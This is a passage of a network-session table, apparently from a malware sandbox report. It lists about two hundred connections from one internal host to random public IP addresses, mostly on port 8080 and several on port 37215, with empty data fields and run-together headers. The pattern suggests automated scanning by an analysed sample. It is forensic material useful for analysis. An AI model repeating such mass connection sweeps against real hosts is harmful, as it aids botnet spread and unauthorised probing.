                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6486192.168.2.235731088.184.123.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6487192.168.2.2352936171.11.31.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6488192.168.2.2352302206.179.87.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6489192.168.2.236054875.54.21.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6490192.168.2.233981251.99.191.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6491192.168.2.2347172220.224.239.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6492192.168.2.2347118204.161.32.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6493192.168.2.2335886199.13.89.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6494192.168.2.2345810104.254.186.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6495192.168.2.2332808196.129.236.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6496192.168.2.235642025.49.131.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6497192.168.2.2333928219.78.212.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6498192.168.2.2333126128.245.108.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6499192.168.2.233817018.67.234.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6500192.168.2.2343376133.160.59.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6501192.168.2.2338328175.89.202.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6502192.168.2.2352690162.18.210.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6503192.168.2.2335054218.223.150.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6504192.168.2.2347870134.196.186.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6505192.168.2.2342638203.51.238.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6506192.168.2.2339366172.146.210.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6507192.168.2.2355218155.29.39.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6508192.168.2.2338072153.128.161.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6509192.168.2.234355471.196.75.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6510192.168.2.235254482.28.23.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6511192.168.2.2354556218.180.65.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6512192.168.2.2344842211.210.97.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6513192.168.2.2348698106.196.41.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6514192.168.2.2352588197.185.34.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6515192.168.2.2346494190.203.220.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6516192.168.2.233875064.114.100.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6517192.168.2.233674250.254.50.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6518192.168.2.2336020193.44.46.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6519192.168.2.2345076190.244.113.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6520192.168.2.2346916144.168.21.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6521192.168.2.2335330139.76.147.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6522192.168.2.2358948115.148.179.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6523192.168.2.2355788198.125.238.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6524192.168.2.2354762106.130.72.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6525192.168.2.2336334104.136.179.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6526192.168.2.2354136138.231.98.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6527192.168.2.235336296.243.192.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6528192.168.2.23429269.220.46.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6529192.168.2.2358048140.116.111.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6530192.168.2.2333908170.135.47.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6531192.168.2.2335016130.31.113.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6532192.168.2.234719092.190.252.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6533192.168.2.236090692.123.143.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6534192.168.2.235225090.73.204.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6535192.168.2.2345090191.222.174.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6536192.168.2.2352234184.105.13.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6537192.168.2.234709617.71.94.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6538192.168.2.235985471.168.190.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6539192.168.2.2357854188.68.16.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6540192.168.2.2339358129.228.189.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6541192.168.2.233488469.169.105.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6542192.168.2.2338944143.66.8.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6543192.168.2.2336896178.139.253.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6544192.168.2.234907697.163.116.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6545192.168.2.2342520185.196.32.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6546192.168.2.2358214211.28.52.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6547192.168.2.2338710163.232.159.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6548192.168.2.2333676112.103.251.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6549192.168.2.235954277.149.120.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6550192.168.2.2356652177.113.249.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6551192.168.2.2338810210.88.66.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6552192.168.2.233473836.0.2.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6553192.168.2.235421483.90.62.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6554192.168.2.233913842.131.219.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6555192.168.2.2357538150.122.145.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6556192.168.2.233885223.200.64.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6557192.168.2.234224094.117.241.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6558192.168.2.233370641.51.234.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6559192.168.2.2349128169.161.250.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6560192.168.2.235923882.23.235.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6561192.168.2.2355372213.131.139.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6562192.168.2.234296094.66.192.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6563192.168.2.234374674.182.163.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6564192.168.2.235833096.246.90.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6565192.168.2.234171436.16.215.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6566192.168.2.233777841.204.195.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6567192.168.2.235706452.172.88.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6568192.168.2.2337488163.148.147.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6569192.168.2.23502908.46.85.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6570192.168.2.235190291.188.218.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6571192.168.2.2333334175.62.255.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6572192.168.2.233930674.56.250.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6573192.168.2.2333944211.254.190.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6574192.168.2.2357770131.176.128.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6575192.168.2.2342408106.155.40.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6576192.168.2.2338618109.165.235.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6577192.168.2.234094461.23.132.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6578192.168.2.233747440.239.193.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6579192.168.2.2358660179.253.92.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6580192.168.2.234628463.183.243.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6581192.168.2.2341776164.46.139.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6582192.168.2.2347190155.10.120.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6583192.168.2.2343926154.225.59.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6584192.168.2.2357392125.19.112.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6585192.168.2.2343880220.141.171.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6586192.168.2.235942083.30.148.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6587192.168.2.2360206136.51.151.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6588192.168.2.234123067.153.99.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6589192.168.2.234710440.90.100.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6590192.168.2.2347624110.152.218.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6591192.168.2.2335890122.144.46.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6592192.168.2.235436046.139.167.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6593192.168.2.2336840204.29.90.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6594192.168.2.23557264.204.138.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6595192.168.2.2353652174.28.148.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6596192.168.2.2358966180.108.251.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6597192.168.2.235261093.137.253.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6598192.168.2.235368047.78.167.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6599192.168.2.235718693.76.239.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6600192.168.2.2352006104.205.200.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6601192.168.2.2350116148.156.145.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6602192.168.2.2349288160.242.191.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6603192.168.2.2351446133.239.66.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6604192.168.2.233902027.87.59.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6605192.168.2.2335058194.163.72.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6606192.168.2.234187460.96.232.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6607192.168.2.2356710207.17.251.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6608192.168.2.234034875.255.202.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6609192.168.2.236008240.220.237.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6610192.168.2.2346586195.31.125.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6611192.168.2.235730249.174.233.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6612192.168.2.233828235.152.252.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6613192.168.2.2339898124.129.204.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6614192.168.2.234540481.4.159.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6615192.168.2.233527686.162.166.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6616192.168.2.235251432.5.227.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6617192.168.2.23399605.187.44.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6618192.168.2.2352588163.130.48.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6619192.168.2.235345631.240.106.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6620192.168.2.2347230151.64.196.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6621192.168.2.2348728140.184.57.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6622192.168.2.2360156124.243.51.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6623192.168.2.235748231.166.154.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6624192.168.2.233507419.159.183.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6625192.168.2.235552225.241.50.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6626192.168.2.234311288.210.221.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6627192.168.2.2345722207.76.128.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6628192.168.2.235788274.135.109.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6629192.168.2.2345066122.123.189.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6630192.168.2.2353992131.14.60.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6631192.168.2.2341282137.245.11.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6632192.168.2.2332922218.117.1.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6633192.168.2.234255692.100.120.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6634192.168.2.2350826105.3.86.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6635192.168.2.2337974213.12.68.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6636192.168.2.2337158156.97.107.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6637192.168.2.23424762.74.7.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6638192.168.2.2336512112.201.51.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6639192.168.2.2334366119.197.121.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6640192.168.2.236007657.41.56.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6641192.168.2.235969620.3.62.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6642192.168.2.233317266.66.56.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6643192.168.2.234466097.254.228.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6644192.168.2.234832475.182.181.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6645192.168.2.2354040217.146.215.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6646192.168.2.234188068.36.62.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6647192.168.2.235635039.97.105.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6648192.168.2.233957071.118.14.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6649192.168.2.23489228.128.240.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6650192.168.2.234961049.128.200.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6651192.168.2.234398472.112.25.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6652192.168.2.2356112157.9.203.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6653192.168.2.2344654188.29.146.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6654192.168.2.233880681.228.192.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6655192.168.2.235259876.134.27.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6656192.168.2.235515823.160.135.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6657192.168.2.2356224113.239.165.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6658192.168.2.234481274.142.94.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6659192.168.2.2345642130.92.38.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6660192.168.2.2356288197.186.124.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6661192.168.2.2342160157.208.187.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6662192.168.2.2348974157.223.128.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6663192.168.2.235141641.247.45.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6664192.168.2.2334116157.203.164.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6665192.168.2.234548641.153.49.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6666192.168.2.233370241.32.16.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6667192.168.2.2345236136.241.163.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6668192.168.2.2358040157.78.38.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6669192.168.2.2349184178.17.51.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6670192.168.2.2352018155.117.178.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6671192.168.2.2353316182.178.218.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6672192.168.2.2336190200.96.10.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6673192.168.2.2334732142.127.159.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6674192.168.2.234986613.16.92.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6675192.168.2.2333450183.53.119.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6676192.168.2.234357418.4.133.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6677192.168.2.2354348172.70.230.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6678192.168.2.2334734178.239.33.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6679192.168.2.2358338140.228.151.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6680192.168.2.2350308109.167.204.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6681192.168.2.235948652.30.35.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6682192.168.2.2333370150.76.44.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6683192.168.2.2358658181.166.45.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6684192.168.2.2353156182.71.161.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6685192.168.2.2348676208.19.50.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6686192.168.2.2360098184.23.91.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6687192.168.2.233628463.32.105.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6688192.168.2.2346302113.147.244.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6689192.168.2.234265085.24.127.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6690192.168.2.233903039.153.200.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6691192.168.2.234221863.121.127.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6692192.168.2.2348978220.24.181.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6693192.168.2.23589324.185.31.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6694192.168.2.2338440131.92.105.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6695192.168.2.2343674207.49.31.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
